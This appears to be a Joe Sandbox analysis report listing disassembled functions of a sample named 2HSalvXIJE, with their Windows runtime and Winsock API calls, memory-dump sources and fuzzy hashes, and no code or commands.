__WSAFDIsSet.WS2_32 ref: 03AA73B4
GetTickCount.KERNEL32 ref: 03AA73BD
gethostbyname.WS2_32 ref: 03AA73D0
htons.WS2_32 ref: 03AA73E8
inet_addr.WS2_32 ref: 03AA73FA
sendto.WS2_32 ref: 03AA7423

Strings

d, xrefs: 03AA7347

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
Instruction ID: 5d10b55c7669d4fd7d0a10485eb3f387a6e1989da4aaed8f4ad8f65dfa64438d
Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
Instruction Fuzzy Hash: AF318F33224B85C6DB21CF61E88479E77A8F788B88F045126EE8D47B28DF79C655CB40

Function 036B6263 Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036B6295

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

__doserrno.LIBCMT ref: 036B628C

Part of subcall function 036B10EF: _getptd_noexit.LIBCMT ref: 036B10F3

__doserrno.LIBCMT ref: 036B62F2
_errno.LIBCMT ref: 036B62F9
_invalid_parameter_noinfo.LIBCMT ref: 036B635D

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
Instruction ID: 608edea61b5a844e4491a918c162049ea44920722af1121b9870f2b1ea64f7a5
Opcode Fuzzy Hash: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
Instruction Fuzzy Hash: B93139316087459FD319FF69DC911B937F2EB43220B05125DD9278B3A2DBB498C28FA5

Function 03AB6E1C Relevance: 16.6, APIs: 11, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB6E4E

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

__doserrno.LIBCMT ref: 03AB6E45

Part of subcall function 03AB1CA8: _getptd_noexit.LIBCMT ref: 03AB1CAC

__doserrno.LIBCMT ref: 03AB6EAB
_errno.LIBCMT ref: 03AB6EB2
_invalid_parameter_noinfo.LIBCMT ref: 03AB6F16

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
Instruction ID: e3a82502736a9c0127947c3c71e86a30e6ed217325b52f1d38978a137acefa02
Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
Instruction Fuzzy Hash: 2421D6367103908AC706EF75D9903AD367DBB81BE0FA9462BDA211F7A7CB78C8418710

Function 03AA71FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03AA721C
select.WS2_32 ref: 03AA7282
__WSAFDIsSet.WS2_32 ref: 03AA7291
__WSAFDIsSet.WS2_32 ref: 03AA72A6
send.WS2_32 ref: 03AA72BC
WSAGetLastError.WS2_32 ref: 03AA72C7
Sleep.KERNEL32 ref: 03AA72D9
GetTickCount.KERNEL32 ref: 03AA72DF

Strings

d, xrefs: 03AA722A

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
Instruction ID: a1041745439e76d8e92ccd9fe7e0cbde23ed24b73c8be3b241ad7bddfc2f740a
Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
Instruction Fuzzy Hash: 0E218C32214B8086EB64CF65F88838E7369F788B84F445126EB9D47B58DF39C558CB44

Function 036B704F Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036B707A

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

__doserrno.LIBCMT ref: 036B7072

Part of subcall function 036B10EF: _getptd_noexit.LIBCMT ref: 036B10F3

__lock_fhandle.LIBCMT ref: 036B70BE
_lseeki64_nolock.LIBCMT ref: 036B70D7
_unlock_fhandle.LIBCMT ref: 036B70FA

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
Instruction ID: e943a13c4925e6074646cc9a57a104b41d13796c4af7c19e34c2db7650b7024f
Opcode Fuzzy Hash: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
Instruction Fuzzy Hash: 992106316187045FD319FB6CDC913B97AF2EF87220F09029DD51A8B2A2DA6458814B6A

Function 03A9FB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A9FB29
GetLastError.KERNEL32 ref: 03A9FB83
GetTickCount.KERNEL32 ref: 03A9FB8E
Sleep.KERNEL32 ref: 03A9FB9E
GetLastError.KERNEL32 ref: 03A9FBAB
WriteFile.KERNEL32 ref: 03A9FBDE
WriteFile.KERNEL32 ref: 03A9FC0D
FlushFileBuffers.KERNEL32 ref: 03A9FC25
DisconnectNamedPipe.KERNEL32 ref: 03A9FC2F
Sleep.KERNEL32 ref: 03A9FC43

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
String ID:
API String ID: 3101085627-0
Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
Instruction ID: 6ec47c8dbbe672f1379c542abc9d2d89035926fd5194a89625664121c5707e80
Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
Instruction Fuzzy Hash: 1531CE36700A008AEB10DFBAD49439C73B5F744B89F404527DE4AABB28DF38C609C741

Function 036B6ED7 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036B6F02

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

__doserrno.LIBCMT ref: 036B6EFA

Part of subcall function 036B10EF: _getptd_noexit.LIBCMT ref: 036B10F3

__lock_fhandle.LIBCMT ref: 036B6F46
_lseek_nolock.LIBCMT ref: 036B6F5F
_unlock_fhandle.LIBCMT ref: 036B6F80

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
Instruction ID: 07d04b505c502e7832623b8df75f281b98f11143a2e36caa4d24189f56394af4
Opcode Fuzzy Hash: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
Instruction Fuzzy Hash: 9A213A31A083405FD308FB6DDC913BD76F6EB82221F05025DD51A8B2A2D7A458C28B56

Function 03AB7A90 Relevance: 15.1, APIs: 10, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB7ABB

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

__doserrno.LIBCMT ref: 03AB7AB3

Part of subcall function 03AB1CA8: _getptd_noexit.LIBCMT ref: 03AB1CAC

__lock_fhandle.LIBCMT ref: 03AB7AFF
_lseek_nolock.LIBCMT ref: 03AB7B18
_unlock_fhandle.LIBCMT ref: 03AB7B39

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
Instruction ID: 1689ca581bac9440ace259f88726feb764acbededca485295128a01454fa3dc2
Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
Instruction Fuzzy Hash: AC1129327107404AD706EF25D9503EDB679BFC17A1F59461BDA260F3D2CBB9C8818B25

Function 03AB7C08 Relevance: 15.1, APIs: 10, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB7C33

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

__doserrno.LIBCMT ref: 03AB7C2B

Part of subcall function 03AB1CA8: _getptd_noexit.LIBCMT ref: 03AB1CAC

__lock_fhandle.LIBCMT ref: 03AB7C77
_lseeki64_nolock.LIBCMT ref: 03AB7C90
_unlock_fhandle.LIBCMT ref: 03AB7CB3

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
Instruction ID: 694412cc99e2feab9d44d3448631a0d815ec1f3028351f49a2b126b8b451fef9
Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
Instruction Fuzzy Hash: 88110F3271064046DB06EF26DA583AD6639ABC2BB1F69471A9A390F3D2CBB984418724

Function 03ABFD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 03ABFD76
_errno.LIBCMT ref: 03ABFD6B

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
Instruction ID: eabedde9e3177f6673505c570502ffa488f00cca23770f0fefd7a372b8cafe48
Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
Instruction Fuzzy Hash: CF41E0766103918EDF20EB2299402FD77BCEB54BE8FAC422BDA944BB87D739C5518710

Function 03AA6500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 03AA6541
htons.WS2_32 ref: 03AA6552
socket.WS2_32 ref: 03AA6594
closesocket.WS2_32 ref: 03AA65A9
gethostbyname.WS2_32 ref: 03AA65C8
htons.WS2_32 ref: 03AA65F8
ioctlsocket.WS2_32 ref: 03AA6612
connect.WS2_32 ref: 03AA662A
WSAGetLastError.WS2_32 ref: 03AA6634

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3339321253-0
Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
Instruction ID: cd5d06b4ababeaf546fb64a5b886ed9ba22f930c3a1eb3018104baa61e3814c2
Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
Instruction Fuzzy Hash: 03318C22324A84C6DF25DF25E8543AF6365F784B98F08112ADE4A477A8EF3CC249CB00

Function 036B587B Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036B58A6

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

__doserrno.LIBCMT ref: 036B589E

Part of subcall function 036B10EF: _getptd_noexit.LIBCMT ref: 036B10F3

__lock_fhandle.LIBCMT ref: 036B58EA
_unlock_fhandle.LIBCMT ref: 036B5924

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
Instruction ID: 7584f1aed368c10b8ec3d423ea383d184ed2fcb8772a44c4ffd42cb300b4bd72
Opcode Fuzzy Hash: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
Instruction Fuzzy Hash: 46210A31A087404FE319FB6DDC913FD76F6DB87231F05025DD62B8B292DBA458828B59

Function 03AA6B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03AA6BE0: htonl.WS2_32 ref: 03AA6C3D
Part of subcall function 03AA6BE0: select.WS2_32 ref: 03AA6CAB
Part of subcall function 03AA6BE0: __WSAFDIsSet.WS2_32 ref: 03AA6CC3
Part of subcall function 03AA6BE0: accept.WS2_32 ref: 03AA6CE0
Part of subcall function 03AA6BE0: ioctlsocket.WS2_32 ref: 03AA6CF8
Part of subcall function 03AA6BE0: __WSAFDIsSet.WS2_32 ref: 03AA6D9B

GetTickCount.KERNEL32 ref: 03AA6BAA

Part of subcall function 03AA6F2C: malloc.LIBCMT ref: 03AA6F5E
Part of subcall function 03AA6F2C: htonl.WS2_32 ref: 03AA6F91
Part of subcall function 03AA6F2C: recvfrom.WS2_32 ref: 03AA6FD5
Part of subcall function 03AA6F2C: WSAGetLastError.WS2_32 ref: 03AA6FE2

GetTickCount.KERNEL32 ref: 03AA6BC2
GetTickCount.KERNEL32 ref: 03AA70E0
GetTickCount.KERNEL32 ref: 03AA70F6
shutdown.WS2_32 ref: 03AA7115
shutdown.WS2_32 ref: 03AA712A
closesocket.WS2_32 ref: 03AA7134
free.LIBCMT ref: 03AA7154
free.LIBCMT ref: 03AA7169

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
String ID:
API String ID: 3610715900-0
Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
Instruction ID: 4c3420ea67010f0978a7b8bb86265e37c8c6f89a119896d6024fae554c674148
Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
Instruction Fuzzy Hash: 7B216F33310E4186EB25DFAAE94432A63B8F748B85F1C552ACA9A47724DF39C5948712

Function 036B509F Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036B50C0

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

__doserrno.LIBCMT ref: 036B50B8

Part of subcall function 036B10EF: _getptd_noexit.LIBCMT ref: 036B10F3

__lock_fhandle.LIBCMT ref: 036B5104
_close_nolock.LIBCMT ref: 036B5117
_unlock_fhandle.LIBCMT ref: 036B5130

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
Instruction ID: 2a28cbdc3675529ebc5954db77e75a57535cb6f4ecbd32e97479cac8b7574408
Opcode Fuzzy Hash: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
Instruction Fuzzy Hash: E8113632509B405FD315EF69DCA03E97EB1EB43320F15066CD61B8B2E2CAB488C18F54

Function 03AB6434 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB645F

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

__doserrno.LIBCMT ref: 03AB6457

Part of subcall function 03AB1CA8: _getptd_noexit.LIBCMT ref: 03AB1CAC

__lock_fhandle.LIBCMT ref: 03AB64A3
_unlock_fhandle.LIBCMT ref: 03AB64DD

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
Instruction ID: 8c22bfc8b0ce4b444834e1b6649149939abd18fdd643c78b04e580f041656250
Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
Instruction Fuzzy Hash: E811593271078046D71AEF25DB503AD6678AB81BE1F59461BDA250F3E2CB78C441C725

Function 03ABA73C Relevance: 13.6, APIs: 9, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03ABA755

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

__lock_fhandle.LIBCMT ref: 03ABA79D
FlushFileBuffers.KERNEL32 ref: 03ABA7B8
GetLastError.KERNEL32 ref: 03ABA7C2
__doserrno.LIBCMT ref: 03ABA7D2
_errno.LIBCMT ref: 03ABA7D9
_unlock_fhandle.LIBCMT ref: 03ABA7E9

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 2927645455-0
Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
Instruction ID: 275f5256960605e313155664ae450acf1da714a9ab88f72934bb9bc01f0ea477
Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
Instruction Fuzzy Hash: AA113B357047804AD716EF69D9903AD673CAB82760F5D061FCA168F393DB78C8C18355

Function 03AB5C58 Relevance: 13.6, APIs: 9, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB5C79

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

__doserrno.LIBCMT ref: 03AB5C71

Part of subcall function 03AB1CA8: _getptd_noexit.LIBCMT ref: 03AB1CAC

__lock_fhandle.LIBCMT ref: 03AB5CBD
_close_nolock.LIBCMT ref: 03AB5CD0
_unlock_fhandle.LIBCMT ref: 03AB5CE9

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
Instruction ID: 5d544177047abbff9aa342d9f27c7dd70af01032fb9b139693680b1b75e6945c
Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
Instruction Fuzzy Hash: F4110A32B103804AD70AEF65DE983AC6779AB837A1F6D072BC9164B3D3C678C4458714

Function 036AF3B3 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 036AF3E1

Part of subcall function 036AE68B: _errno.LIBCMT ref: 036AE6AB

free.LIBCMT ref: 036AF3F6
free.LIBCMT ref: 036AF417
free.LIBCMT ref: 036AF42C
free.LIBCMT ref: 036AF440
